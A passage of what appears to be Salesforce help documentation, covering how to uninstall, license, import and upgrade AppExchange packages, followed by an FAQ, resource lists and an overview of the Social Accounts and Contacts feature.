notes and attachments. When the uninstall is complete, Salesforce sends an email containing a link to the export file to
the user performing the uninstall. The export file and related notes and attachments are listed below the list of installed
packages. We recommend storing the file elsewhere because it is only available for a limited period of time after the uninstall
completes.

Tip:  If you reinstall the package later and want to reimport the package data, see Importing Package Data on
page 733.

Notes on Uninstalling Packages
• If you are uninstalling a package that includes a custom object, all components on that custom object are also deleted. This

includes custom fields, validation rules, s-controls, custom buttons and links, as well as workflow rules and approval
processes.

• You cannot uninstall a package whenever any component in the package is referenced by a component that will not get
included in the uninstall. For example:
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◊ When an installed package includes any component on a standard object that another component references, Salesforce
prevents you from uninstalling the package. This means that you can install a package that includes a custom user field
and build a workflow rule that gets triggered when the value of that field is a specific value. Uninstalling the package
would prevent your workflow from working.

◊ When you have installed two unrelated packages that each include a custom object and one custom object component
references a component in the other, Salesforce prevents you from uninstalling the package. This means that you can
install an expense report app that includes a custom user field and create a validation rule on another installed custom
object that references that custom user field. However, uninstalling the expense report app prevents the validation rule
from working.

◊ When an installed folder contains components you added after installation, Salesforce prevents you from uninstalling
the package.

◊ When an installed letterhead is used for an email template you added after installation, Salesforce prevents you from
uninstalling the package.

• Uninstall export files contain custom app data for your package, excluding some components, such as documents and
formula field values.

Managing Package Installations
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Download AppExchange Packages”To uninstall packages:

“Manage Package Licenses”To assign licenses for a managed package:

“Download AppExchange Packages”To download or delete the export file for an uninstalled
package:

View a list of the packages you installed from AppExchange and data export files from uninstalled packages by clicking Installed
Packages. These packages can be either managed or unmanaged.

Note: Salesforce only lists license information for managed packages. For unmanaged packages, the license-related
fields, such as Allowed Licenses, Used Licenses, and Expiration Date, will display the value “N/A.”

Using this list, you can:

• Click Uninstall to remove the package and all its components from your Salesforce organization.

• Click Manage Licenses to assign available licenses to users in your organization. This is only available for licensed managed
packages.

Note: If you purchased a site license or if the managed package is not licensed, Salesforce automatically assigns
licenses to all your users and the ability to manage licenses is not available. Your users can use the package as long
as they have the appropriate permissions.

• Click Configure if the publisher has included a link to an external website with information about configuring the package.

• Click the package name to view details about this package.
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• View the publisher of the package.

• View the status of the licenses for this package. Available values include:

◊ Trial

◊ Active

◊ Suspended

◊ Expired

◊ Free

This field is only displayed if the package is managed and licensed.

• Track the number of licenses available (Allowed Licenses) and the number of licenses that are assigned to users (Used
Licenses).

• View the date your licenses for this package are scheduled to expire.

• View the date your licenses were installed.

Note:  If you have not installed a licensed managed package, the Publisher, Status, Allowed Licenses, Used
Licenses, and Expiration Date fields do not appear.

After an uninstall, Salesforce automatically creates an export file containing the package data, as well as any associated notes
and attachments. When the uninstall is complete, Salesforce sends an email containing a link to the export file to the user
performing the uninstall. The export file and related notes and attachments are listed below the list of installed packages. We
recommend storing the file elsewhere because it is only available for a limited period of time after the uninstall completes.
Using this list, you can:

• Click Download to open or store the export file.

• Click Del to delete the export file.

See Also:
Displaying Installed Package Details
Importing Package Data

Displaying Installed Package Details

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Download AppExchange Packages”To uninstall packages:

“Manage Package Licenses”To manage user licenses for an AppExchange package:

The package detail page displays essential details about the package you installed from AppExchange. To access the package
detail page, from Setup click Installed Packages, then click the name of the package you want to view.

From this page, you can:
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• Click Uninstall to remove the package and all its components from your Salesforce organization.

• Click Manage Licenses to assign available licenses to users in your organization. This is only available for licensed managed
packages.

Note: If you purchased a site license or if the managed package is not licensed, Salesforce automatically assigns
licenses to all your users and the ability to manage licenses is not available. Your users can use the package as long
as they have the appropriate permissions.

• Optionally, click View Dependencies and review a list of components that rely on other components, permissions, or
preferences within the package.

Viewing Installed Packages

The installed package page lists the following package attributes (in alphabetical order):

DescriptionAttribute

Can be one of two options:Action

• Uninstall
• Manage Licenses

The total number of licenses you purchased for this package.
The value is “Unlimited” if you have a site license for this

Allowed Licenses

package. This field is only displayed if the package is managed
and licensed.

A detailed description of the package.Description

The date of the package installation.Installed Date

The date that this license expires, based on your terms and
conditions. The expiration date is “Does Not Expire” if the

Expiration Date

package will never expire.This field is only displayed if the
package is managed and licensed.

The one to 15-character alphanumeric identifier that
distinguishes a package and its contents from packages of other
developers on AppExchange.

Namespace

The name of the package, given by the publisher.Package Name

The publisher of an AppExchange listing is the Salesforce
user or organization that published the listing. This field is
only displayed if the package is managed and licensed.

Publisher

A list of the Connected Apps that can have access to a user's
Salesforce data after the user and the application have been
verified.

Connected Apps

The state of a package. Available values include:Status

• Trial
• Active
• Suspended
• Expired
• Free
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DescriptionAttribute

This field is only displayed if the package is managed and
licensed.

The total number of licenses that are already assigned to users.
This field is only displayed if the package is managed and
licensed.

Used Licenses

The version name for this package version. The version name
is the marketing name for a specific release of a package. It is
more descriptive than the Version Number.

Version Name

Viewing Installed Package Details

The installed package detail page lists the following package attributes (in alphabetical order):

DescriptionAttribute

The type of access that the API and dynamic Apex code that
package components have. The default setting is Unrestricted,

API Access

which means that all package components that access the API
have the same access as the user who is logged in. Click Enable
Restrictions or Disable Restrictions to change the API and
dynamic Apex access permissions for a package.

A detailed description of the package.Description

The first installed version of the package in your organization.
This field is only displayed for managed packages. You can

First Installed Version Number

reference this version and any subsequent package versions
that you have installed. If you ever report an issue with a
managed package, you should include the version number in
this field when communicating with the publisher.

The name of the user that installed this package in your
organization.

Installed By

The name of the last user to modify this package, including
the date and time.

Modified By

The one to 15-character alphanumeric identifier that
distinguishes a package and its contents from packages of other
developers on AppExchange.

Namespace

The name of the package, given by the publisher.Package Name

Indicates whether this is a managed or unmanaged package.Package Type

The publisher of an AppExchange listing is the Salesforce
user or organization that published the listing. This field is
only displayed if the package is managed and licensed.

Publisher

The version name for this package version. The version name
is the marketing name for a specific release of a package. It is
more descriptive than the Version Number.

Version Name
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DescriptionAttribute

The version number for the latest installed package version.
The format is majorNumber.minorNumber.patchNumber,

Version Number

such as 2.1.3. The version number represents a release of a
package. The Version Name is a more descriptive name for
the release. Note that the patchNumber is generated only
when you create a patch. If there is no patchNumber, it is
assumed to be zero (0).

You can also see a list of the components included in an installed package. The following component information is displayed
(in alphabetical order):

DescriptionAttribute

Displays the name of the component.Name

Displays the name of the parent object a component is
associated with. For example, a custom object is the parent of
a custom field.

Parent Object

Displays the type of the component.Type

See Also:
Importing Package Data
Managing Package Installations

Importing Package Data

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

The permissions required to use the import tool you choose,
such as the import wizard or Data Loader.

To import Force.com AppExchange package data:

When you uninstall an AppExchange package, Salesforce automatically creates an export file containing the package data as
well as any associated notes and attachments. If you choose to install the package again, you can import this data.

To import your AppExchange package data, use one of the following tools that is available for your Edition:

• For Group Edition, use the appropriate import wizard.

• For Professional Edition, use the appropriate import wizard or any compatible salesforce.com ISV Partner integration
tool.
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• For Enterprise, Developer, and Unlimited Edition, use the Data Loader.

Notes on Importing AppExchange Package Data

• Salesforce converts date fields into date/time fields upon export. Convert the appropriate fields into date fields before you
import.

• Salesforce exports all date/time fields in Greenwich Mean Time (GMT). Before importing these fields, convert them to
the appropriate time zone.

• The value of auto number fields may be different when you import. To retain the old values, create a new custom auto
number field on a custom object before importing the data.

• Salesforce updates system fields such as Created Date and Last Modified Date when you import. To retain the
old values for these fields, contact salesforce.com support.

• Relationships are not included in the export file. Recreate any master-detail or lookup relationships after importing your
data.

• Record type IDs are exported but not the record type name.
• Field history is not exported.
• Recreate any customizations that you made to the package after installation.

See Also:
Displaying Installed Package Details
Managing Package Installations

Managing Licenses for Installed Packages
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Package Licenses”To manage licenses for a AppExchange package:

When you install a licensed managed package in your organization from AppExchange, you purchase a certain number of
licenses from the package developer or publisher. You can assign each license to a user within your organization. If you assign
all available licenses, but would like to grant licenses to additional users, you can reassign a license or purchase more. To get
more licenses, contact the publisher of the managed package.

Note: If you purchased a site license or if the managed package is not licensed, Salesforce automatically assigns
licenses to all your users and the ability to manage licenses is not available. Your users can use the package as long as
they have the appropriate permissions.

1. From Setup, click Installed Packages.
2. Click Manage Licenses next to the package.

Note:  To assign licenses for a package, you must have access to the package and at least one available license.
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• To assign licenses to more users, click Add Users.
• To remove a license from a user, click Remove next to the user's name. To remove licenses from multiple users, click

Remove Multiple Users.
• Click any column heading to sort the users in ascending order using the data in that column. Click the heading again

to sort in descending order.
• If available, select fewer or more to view a shorter or longer display list.

See Also:
Assigning Licenses for Managed Packages
Assigning Licenses for Installed Packages
Removing Licenses for Installed Packages
Responding to License Manager Requests

Assigning Licenses for Managed Packages

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To edit users:

“Manage Package Licenses”To manage licenses for an AppExchange package:

When you install a licensed managed package in your organization from AppExchange, you purchase a certain number of
licenses from the package developer or publisher. You can assign each license to a user within your organization. If you assign
all available licenses, but would like to grant licenses to additional users, you can reassign a license or purchase more. To get
more licenses, contact the publisher of the managed package.

The Managed Packages related list on the user detail page lists all managed packages that user is assigned. Assigning a license
for a managed package makes the package available to the user within Salesforce.

Unmanaged packages will not appear on this list, as you cannot assign licenses for them.

To assign a user to a license for one of the available managed packages:

1. From Setup, click Manage Users > Users.
2. Click Assign Licenses from the Managed Packages list.
3. Select the package you want to assign to the user. All available managed packages are listed in the Unassigned Packages

list. After selecting a package, Salesforce automatically moves it to the Selected Packages list.

The Unassigned Packages list displays all packages that this user could access if assigned a license. Packages will not appear
on this list if they are unmanaged, uninstalled, in use, or not available.

• Click a letter to view the packages that begin with that letter or click All to display all available managed packages.
• Click select shown to select all packages displayed in the Unassigned Packages list on the current page, adding them

to the Selected Packages list below.
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• Click deselect shown or deselect all to move packages from the Selected Packages area to the Unassigned Packages
area.

4. Click Add.

To revoke a license from this user, click the Remove link next to the appropriate package name.

See Also:
Managing Licenses for Installed Packages

Assigning Licenses for Installed Packages

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Package Licenses”To manage licenses for an AppExchange app:

To assign licenses to Force.com AppExchange users:

Note: If you purchased a site license or if the managed package is not licensed, Salesforce automatically assigns
licenses to all your users and the ability to manage licenses is not available. Your users can use the package as long as
they have the appropriate permissions.

1. From Setup, click Installed Packages to find the installed package that has available licenses.
2. Click the Manage Licenses link next to the package name.
3. Click Add Users.
4. Choose a view from the drop-down list, or click Create New View to build a new custom view.
5. Click a letter to filter the users with a last name that corresponds with that letter or click All to display all users who match

the criteria of the current view.
6. Select users.

• To select individual users, use the checkboxes. Selected users are listed in the Selected list. When the list includes all
users to which you want to assign licenses, click Add.

• To select all users for the current view, click Add All Users then click OK.

Note:  You can also add a single user from the user's detail page.

See Also:
Managing Licenses for Installed Packages
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Removing Licenses for Installed Packages

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Package Licenses”To manage licenses for an AppExchange package:

To remove licenses for an AppExchange package from multiple users:

1. From Setup, click Installed Packages.
2. Click Manage Licenses next to the package name.
3. Click Remove Multiple Users.
4. To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define

your own custom views.
5. Click a letter to filter the users with a last name that corresponds with that letter or click All to display all users who match

the criteria of the current view.
6. Select users.

• To select individual users, use the checkboxes. Selected users appear in the Selected for Removal list. When the list
includes all users for which you want to remove licenses, click Remove.

• To select all users in the current view, click Remove All Users, then click OK.

You can also remove licenses for an AppExchange package from a single user using the following options:

1. From Setup, click Manage Users > Users and click Remove next to the package in the managed packages list.
2. From Setup, click Installed Packages, then click Manage Licenses next to the package name, and click Remove next to

the user.

See Also:
Managing Licenses for Installed Packages
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Responding to License Manager Requests

Available in: Developer Edition

Package uploads and installs are available in Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To respond to registration requests:

A license manager is a Salesforce organization that tracks all Salesforce subscribers installing a particular AppExchange package.
Salesforce administrators can choose to designate another organization as the license manager for one of their packages. The
license manager does not need to be the same organization as the one from which the package is managed. To choose another
organization as the license manager, all you need is an email address (not a Salesforce username). If a Salesforce administrator
selects to have a third-party license manager and enters your email address, you will receive a license management request in
email.

To respond to a registration request:

1. Click the link in the license management request email. This displays the registration request in the requestor's Developer
Edition organization.

2. Click Accept to complete the registration process. Alternatively, click Reject to decline the request and close the browser;
this prevents you from using the link again.

Note:  If you accept this request, you authorize Salesforce to automatically create records in your Salesforce
organization to track information about this package. Choosing a license manager organization is permanent and
cannot be changed.

3. Enter the username and password for the Salesforce organization you want to use to manage licenses for this package. A
license manager can be any Salesforce organization that has installed the free License Management Application (LMA)
from Force.com AppExchange.

4. Click Confirm.

See Also:
Managing Licenses for Installed Packages
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Upgrading Packages
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Upload AppExchange Packages”To upload packages:

“Download AppExchange Packages”To install and uninstall packages:

Salesforce supports upgrades for managed packages only. Publishers can publish an upgrade for a managed package and notify
installers that the new version is available. Installers of a managed package can then install the upgrade as follows:

1. Before you install an upgrade, determine if the app you installed was from a managed package. Look for the Managed
- Installed icon on the detail pages for each component and on the list of packages installed.

If the app you installed is not from a managed package, upgrades for it are not available.

2. Then, install the upgrade in the same way you would install any other package from Force.com AppExchange directory.
If the publisher provided a link to the new version, follow the link to the package posting and install it in your organization.
The first page of the install wizard lists the current version you have installed, the version you are about to install, and a
list of additional components included in the new version.

Notes on Upgrading Managed Packages
Consider the following when upgrading a managed package:

• All existing custom objects that were previously deployed will still be deployed. Salesforce prompts you to deploy any new
custom objects or previously undeployed custom objects.

• Profile settings are editable but not upgradeable. After upgrading, update the profile settings for any custom objects included
in the package. The developer can make changes to profile settings after releasing them, but those changes will not be
included in an upgrade. However, changes made to permission sets are included in the upgrade for any permission sets
that were included in the package.

• If the developer chooses to add universally required custom fields, the fields will have default values.
• Translation Workbench values for components that are “editable but not upgradeable” are excluded from upgrades.
• If an installed package has Restricted API access, upgrades will be successful only if the upgraded version does not

contain any s-controls. If s-controls are present in the upgraded version, you must change the currently installed package
to Unrestricted API access.

• When you upgrade a package, changes to the API access are ignored even if the developer specified them. This ensures
that the administrator installing the upgrade has full control. Installers should carefully examine the changes in package
access in each upgrade during installation and note all acceptable changes. Then, because those changes are ignored, the
administrator should manually apply any acceptable changes after installing an upgrade.

See Also:
Force.com Quick Reference for Developing Packages
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Installing Packages FAQ
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

• Can I uninstall packages that I installed from AppExchange?

• Why did my uninstall fail?

• Who can use AppExchange?

• Why did my install or upgrade fail?

• Can I customize AppExchange packages?

• Who can use AppExchange packages?

• How can I upgrade an installed package?

• How secure are the components I install?

• What happens to my namespace prefix when I install a package?

• Can I reinstall an AppExchange package after uninstalling it?

• Why do the custom apps, objects, and tabs in an installed package appear to not affect the limits for my Salesforce Edition?

Can I uninstall packages that I installed from AppExchange?
Yes. All your installed packages are listed in the Installed Packages page. You can remove any package by clicking the Uninstall
link next to the package name.

See Also:
Uninstalling a Package
Importing Package Data

Why did my uninstall fail?
Salesforce prevents you from uninstalling a package if it causes any remaining components to malfunction.

See Also:
Uninstalling a Package

Who can use AppExchange?
Anyone can browse and test drive AppExchange listings. Salesforce administrators and users with the “Download AppExchange
packages” permission can install AppExchange apps. To publish an app on AppExchange, a user must have both “Create
AppExchange packages” and “Upload AppExchange packages” permissions.
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Why did my install or upgrade fail?
An install can fail for several reasons:

• The package includes custom objects that will cause your organization to exceed its limit of custom objects.
• The package includes custom tabs that will cause your organization to exceed its limit of custom tabs.
• The developer of the package has uploaded a more recent version of the package and has deprecated the version associated

with this installation URL. Contact the publisher of the package to get the most recent installation URL.
• You are trying to install an extension to a package, and you don't have the base package installed.
• The package requires that certain components are enabled in your organization, or that required features are enabled in

your edition.
• The package contains Apex code and you are not authorized to run Apex in your organization.
• The package you are installing has a failing Apex test.

Can I customize AppExchange packages?
Yes, all packages are customizable. However, to ensure compatibility with future versions, some aspects of managed packages
can't be changed.

For a list of components that are editable in a managed package, see ISVforce Guide.

Who can use AppExchange packages?
If you use an Enterprise, Unlimited, or Developer Edition organization, you can choose which user profiles have access to the
package as part of the installation process. Packages installed in Professional and Group Edition organizations are installed
with “Full Access” to all user profiles. However, regardless of Edition, all custom objects are installed in “In Development”
mode which hides them from all standard users. Users must have the “Customize Application” permission to view custom
objects in “In Development” mode. When you are ready to roll out the package to other users, change the custom object status
to “Deployed.”

How can I upgrade an installed package?
Managed packages are completely upgradeable. Before installing a package, contact the publisher to determine if it’s managed.

How secure are the components I install?
Salesforce.com performs periodic security reviews of all publicly listed applications on AppExchange. When installing third
party applications with access to data, these applications may have access to other data within the organization where the
package was installed. Private listings do not go through a security review and administrators should inspect the application
carefully before determining whether it should be installed within their organization.
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What happens to my namespace prefix when I install a package?
A namespace prefix is a globally unique identifier that you can request if you plan to create a managed package. All the
components from a managed package that you install from another developer contain the developer's namespace prefix in your
organization. However, unmanaged packages can also have a namespace prefix if they originated from an organization that
contained a managed package. When you install an unmanaged package that contains a namespace prefix, Salesforce replaces
the developer's namespace prefix with yours.

Can I reinstall an AppExchange package after uninstalling it?
Yes. You can reinstall a package in the same manner that you installed it.

See Also:
Installing a Package
Importing Package Data

Why do the custom apps, objects, and tabs in an installed package appear
to not affect the limits for my Salesforce Edition?

The custom apps, tabs, and objects contained in a package that is publicly posted on the AppExchange do not count against
the limits of your Salesforce Edition.

Printable Resources for Administrators
In addition to online help, salesforce.com publishes printable documentation to help you successfully administer Salesforce.

These documents include tip sheets, user guides, implementation guides, and other resources that describe the features and
capabilities of Salesforce. These documents are available as Adobe® PDF files. Adobe Reader® is required to open PDF files;
to download the latest version of Reader, go to www.adobe.com/products/acrobat/readstep2.html.

Salesforce Implementations
• Salesforce Enterprise Edition Upgrade Guide
• Setting Up SalesforceGroup Edition
• Salesforce Limits Quick Reference Guide

Security and Data Management
• Security Implementation Guide
• Single Sign-On Implementation Guide
• Tips & Hints for Sharing Data
• Understanding Defer Sharing Calculations
• Managing Data Quality
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• Implementing Data.com Clean for Accounts, Contacts, and Leads
• Importing Your Organization’s Accounts and Contacts
• Using Mass Delete to Undo Imports
• Getting Started with Divisions
• Data Loader Guide
• Salesforce Field Reference Guide
• Resolving Data Conflicts and Errors in Force.com Flex Apps

Videos for Salesforce Administrators
In addition to online help, salesforce.com creates video demos to help you learn about our features and successfully set up and
manage Salesforce.

Data Import

For
Administrators

For End UsersVideo Title

Data Import Overview (1:38 minutes)

If you’re importing data into Salesforce, the Data Import video series is a must-see.
This overview video gives a quick glimpse of what each video covers, and lets you
use the clickable list of titles to access the videos you’re interested in.

Preparing Your Data for Import (4:54 minutes)

Learn how to clean up your import files and get Salesforce ready, as well as best
practices for keeping data clean once it’s been imported.

Cleaning and Preparing Your Data Using Excel (11:27 minutes)

Excel offers many features and functions to make quick work of getting your data
files ready for import. We’ll show you some practical ways to use these features
with your import data.

Should I Use Data Loader (6:34 minutes)

Learn Data Loader in depth, so you can decide whether it’s right for your needs.
We compare it to the Import Wizards and also list some other tools you might
consider.

Importing Your Data in the Right Order (7:49 minutes)

Learn, step by step, which objects should be imported, and when.

Best Practices for Importing Data (2:47 minutes)
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For
Administrators

For End UsersVideo Title

Learn the top pain points experienced by our customers, so you can avoid them
entirely! This video could save you hours of frustration. We detail how to delete a
bad import, how to back up data before import, and more.

Users’ Access to Data

For
Administrators

For End UsersVideo Title

Who Sees What: Overview (4:33 minutes)

Learn how you can control who sees what data in your organization.

Who Sees What: Organization Access (4:25 minutes)

Learn how to restrict login through IP ranges and login hours.

Who Sees What: Object Access (5:51 minutes)

Learn how you can grant users access to objects by using profiles.

Who Sees What: Organization-Wide Defaults (6:36 minutes)

Learn how you can restrict access to records owned by other users.

Who Sees What: Record Access via the Role Hierarchy (7:29 minutes)

Learn how you can open up access to records using the role hierarchy.

Who Sees What: Record Access via Sharing Rules (4:27 minutes)

Learn how you can grant access to records using sharing rules.

Who Sees What: Field-level Security (3:58 minutes)

Learn how you can restrict access to specific fields on a profile by profile basis.

Creating a Criteria-Based Sharing Rule (1:13 minutes)

Learn how to create a sharing rule based on a field value in a record.
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Managing Users

For
Administrators

For End UsersVideo Title

Removing Users’ Access to Salesforce (3:45 minutes)

Deactivating users in Salesforce removes access to their account data while preserving
their historical activity and records. Once you understand why you deactivate users
rather than deleting them, learn how to deactivate someone and see what happens
to their data.
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Welcome, Sales Professionals
Use this documentation set to help you get up and running with Salesforce, so you can increase your successes when you sell
to your customers. You’ll find that this documentation contains concepts and tasks that are specific to your goals. If you also
help administer Salesforce, you may find it necessary to refer to the documentation set for administrators, Set Up and Maintain
Sales Tools, which includes tasks that are specific to Salesforce administrators.

We hope these two sets of documentation provide the complete content you need to increase your sales while using Salesforce.
If you need further support, contact your Salesforce administrator or salesforce.com Customer Support.

MANAGING THE PEOPLE AND ORGANIZATIONS YOU SELL TO

ESTABLISHING YOUR CUSTOMERS, COMPETITORS, AND
PARTNERS

Social Accounts, Contacts, and Leads Overview

Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

Contacts available in: All Editions except Database.com

Leads available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

Data.com Clean available in: Developer, Enterprise, and Professional editions

Data.com Clean available for an additional cost in: Unlimited Edition

Social Key available in: in: Developer, Enterprise, and Professional, and Unlimited editions

The Social Accounts and Contacts feature provides easy access to social network profiles and other social information for your
accounts, contacts, and leads, directly in Salesforce. This social intelligence gives your users the advantage they need to better
serve their current and potential customers.. The Social Accounts and Contacts feature is enabled by default for organizations

SELL TO YOUR CUSTOMERS
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created after the Spring ’12 release. For organizations created before that release, the administrator must enable Social Accounts
and Contacts.

Organizations that use the Data.com Clean product also get Data.com Social Key (in beta release for Summer ’13), which
makes finding contacts’ social information even easier. Data.com Clean’s automated clean jobs search LinkedIn, Twitter, and
Facebook for your contacts’ social handles, and add them automatically to your contact records. You’ll only have to select the
social network profile you want if we find multiple social network profiles that might match your contact.

Note:  In the online help and other Salesforce documentation, the word “account” by itself always refers to both
business accounts and person accounts. The terms “business account” and “person account” are used when there are
differences between the two kinds of accounts.

You can see social information from several social networks.

Supported ObjectsWhat you see in SalesforceSocial
Network

Accounts (does not include Social
Key)

Facebook® gives you a more personal view of your existing and potential
customers and helps you find common interests. For contacts, leads, and

Facebook

person accounts, you can see profiles, status updates, and the number of Contacts
mutual friends you share. For business accounts, you can view your customers’

Leadscorporate social media presence, including their company profile and wall
posts.

AccountsKlout™ is a third-party service that analyzes people's influence across social
networks, including Twitter, Facebook, and LinkedIn. Use Klout to see

Klout

Contacts
your accounts', contacts', and leads' influence on social media, who they
influence, who influences them, and the topics they talk about. Leads

ContactsLinkedIn® is useful for staying up to date on your contacts', leads', and person
accounts' professional personas. You can see profile photos, current titles
and companies, and locations.

LinkedIn

Leads

Person Accounts (does not
include Social Key)

Accounts (does not include Social
Key)

Twitter™ is a great way to see the public personas of your existing and
potential customers and learn what's on their minds. You can see bios, recent

Twitter

tweets, and the people who are following and being followed by your
accounts, contacts, and leads.

Contacts

Leads

AccountsYouTube™ helps you find and view videos related to your accounts, contacts,
and leads.

YouTube

Contacts

Leads

Additional social networks may be available in future updates.
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Important:  The Social Accounts and Contacts feature uses Facebook, Klout, LinkedIn, Twitter, and YouTube public
APIs to display social information in Salesforce. Because these social networks have the option of modifying or
terminating access to their APIs at any time, salesforce.com can’t guarantee the future availability of this feature or
any of its functionality, including access to the data that is currently provided or to any particular social network as a
whole.

To get started with Social Accounts and Contacts, simply sign in to your social network accounts from any account, contact,
or lead detail page. This creates private connections between Salesforce and your social network accounts, allowing you to see
external social profiles in Salesforce.

Then you’re ready to take your customer insights to the next level by linking your accounts’, contacts’, and leads’ social profiles
to their Salesforce records. Once you link a profile to a record, that social data is available to you and everyone else in your
organization, without having to log in to other sites. The details that each Salesforce user can see depends on their connection
level with the account, contact, or lead, as well as the privacy settings for the profile. Regardless of how much detail is visible,
the information that Salesforce displays is always current.

Click the social network icons in the header on account, contact, and lead detail pages to display the Social Accounts and
Contacts viewer. If no icons are visible, Social Accounts and Contacts is disabled for your organization. If a social network
icon is missing, that service may be turned off. Contact your administrator if you'd like to use this feature or want access to a
social network that isn't currently available.

See Also:
Security and Privacy When Using Social Accounts and Contacts
Data.com Social Key Overview—Beta

Accounts Overview

Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

Accounts are your organization's customers, competitors, and partners. Each account stores information such as name, address,
and phone numbers. For each account, you can store related information such as opportunities, activities, cases, partners,
contracts, and notes.

The Accounts tab displays a home page that lets you quickly create and locate all types of accounts, and also sort and filter
your accounts using standard and custom list views. In addition, this tab lets you view and edit detailed information on each
account to which you have access.

You can also enhance your traditional account data with your customers’ social information. With the Social Accounts and
Contacts feature, you can see your accounts’ social network profiles and other social data—directly in Salesforce. Easy access
to this information helps you know your customers better, so you can solve their problems and build stronger relationships.

If your organization has been enabled with person accounts, you have two different kinds of accounts: business accounts and
person accounts. Business accounts represent the other companies with which your organization does business. For business
accounts, the individuals who work at those companies are represented by contacts. Person accounts represent the individual
consumers with whom your company does business, such as a financial services client, an online shopper, or a vacation traveler.
Depending on your organization's business model, you may use business accounts, person accounts, or both.
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If your organization has a partner portal, you can create partner accounts. Partner accounts are business accounts that a channel
manager uses to manage partner organizations, partner users, and activities.

Note:  In the online help and other Salesforce documentation, the word “account” by itself always refers to both
business accounts and person accounts. The terms “business account” and “person account” are used when there are
differences between the two kinds of accounts.

See Also:
Accounts Home

Security and Privacy When Using Social Accounts and Contacts

Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

Contacts available in: All Editions except Database.com

Leads available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

Data.com Clean available in: Developer, Enterprise, and Professional editions

Data.com Clean available for an additional cost in: Unlimited Edition

Social Key available in: in: Developer, Enterprise, and Professional, and Unlimited editions

Social Accounts and Contacts is secure and private. Here's an overview of its security and privacy features:

• Salesforce uses the trusted OAuth protocol when you sign in to your Facebook, LinkedIn, or Twitter accounts, so your
login credentials aren't exposed to Salesforce.

• Salesforce doesn't import or store social information. Each time you select a contact's social profile or YouTube video,
Salesforce retrieves the information directly from the corresponding social network and simply displays it. The information
that you see is read-only and can't be modified.

• You can't import or store social data in Salesforce records. This ensures that you always see current details when viewing
your accounts', contacts', and leads' social information.

• The details that are visible to you when you view a Facebook, LinkedIn, or Twitter profile are determined by the connection
that you have with the account, contact, or lead, as well as privacy settings. Typically you see the same information as you
would when viewing the profile while logged in directly to the social network. Some of your customers, however, may have
privacy settings that restrict the visibility of some or all of their profile details outside the network. In those cases, you see
very few, if any, profile details in Salesforce.

• Your view of a Facebook, LinkedIn, or Twitter profile is not shared with anyone else in your organization. Other Salesforce
users must sign in to their own social network accounts to use Social Accounts and Contacts and the profile details that
are visible depend on each user's connection level with the account, contact, or lead, as well as their privacy settings.

• None of your Facebook, LinkedIn, or Twitter profile information is stored in Salesforce, nor does Salesforce post anything
about you or your activities to your social network accounts.

• Accounts, contacts, and leads aren't notified when you view their social network profiles using the Social Accounts and
Contacts feature.
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Important:  The Social Accounts and Contacts feature uses Facebook, Klout, LinkedIn, Twitter, and YouTube public
APIs to display social information in Salesforce. Because these social networks have the option of modifying or
terminating access to their APIs at any time, salesforce.com can’t guarantee the future availability of this feature or
any of its functionality, including access to the data that is currently provided or to any particular social network as a
whole.

See Also:
Social Accounts, Contacts, and Leads Overview
Using Social Accounts

Signing in to Your Social Network Accounts from Account Detail Pages

Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on accountsTo sign in to your social network accounts from business
account detail pages:

“Read” on accounts and contactsTo sign in to your social network accounts from person account
detail pages:

To get started using Social Accounts and Contacts, you first need to sign in to your social network accounts from any account,
contact, or lead detail page. This creates private connections between Salesforce and your social network accounts, allowing
you to see external social profiles in Salesforce. These connections persist in future Salesforce sessions so you don't have to
sign in to your social network accounts again unless you sign out in the Social Accounts and Contacts viewer.

Note:  You can see YouTube videos without doing these steps. The Klout service is only available when you’re signed
in to your Twitter account..

To sign in to your social network accounts from an account detail page:

1. On the Accounts home page or in an Accounts list view, click an account’s name to display the detail page. You can sign
in from any account detail page that you have permission to read.

2. In the header on the detail page, click a social network icon ( ).
3. Click Sign in button on the Social Accounts and Contacts viewer.
4. Enter your social network account credentials and authorize Salesforce to access your account.Your Salesforce account and

social network account are now connected.
5. If you want to log in to another social network, just click its tab on the viewer.
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Note: Salesforce users who are not within either the Salesforce.com or Force.com domains, such as Cloud.com users,
cannot Log into Facebook from within Salesforce.

See Also:
Using Social Accounts
Social Accounts, Contacts, and Leads Overview

Tips for Finding Your Accounts' Social Information

Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

When you want to associate a social network profile with an account—either for the first time or if you’re switching to a
different profile using the Find Different Profile button—the Social Accounts and Contacts feature uses the Account Name
field on the account record as the default search criteria. The default search criteria is also used when you want to find YouTube
videos related to an account.

Here are some tips if you’re having trouble finding an account’s social information.

• If the default search can't locate your account’s social network profile or YouTube videos related to the account, enter
different keywords in the search box on the Social Accounts and Contacts viewer and click Search.

• For business accounts, the account name on the Salesforce record may not exactly match the company name used in their
social network account or in YouTube video keyword tags. Try different variations of the account name, such as Universal
Paper or Universal Paper, Incorporated instead of Universal Paper, Inc.

• Similarly for person accounts, the account name in Salesforce may differ from your person account’s social network user
name or the person’s name used in YouTube video keyword tags. Try different variations of the person account’s name;
for example, search for Maddie Rigsby instead of Madison Rigsby.

If you still can't find the correct profile, your Salesforce account may not be active in any social networks or their privacy
settings may be blocking you from finding their profile in a search. If your YouTube searches are still unsuccessful, the account
may not be featured in any videos shared on YouTube.

See Also:
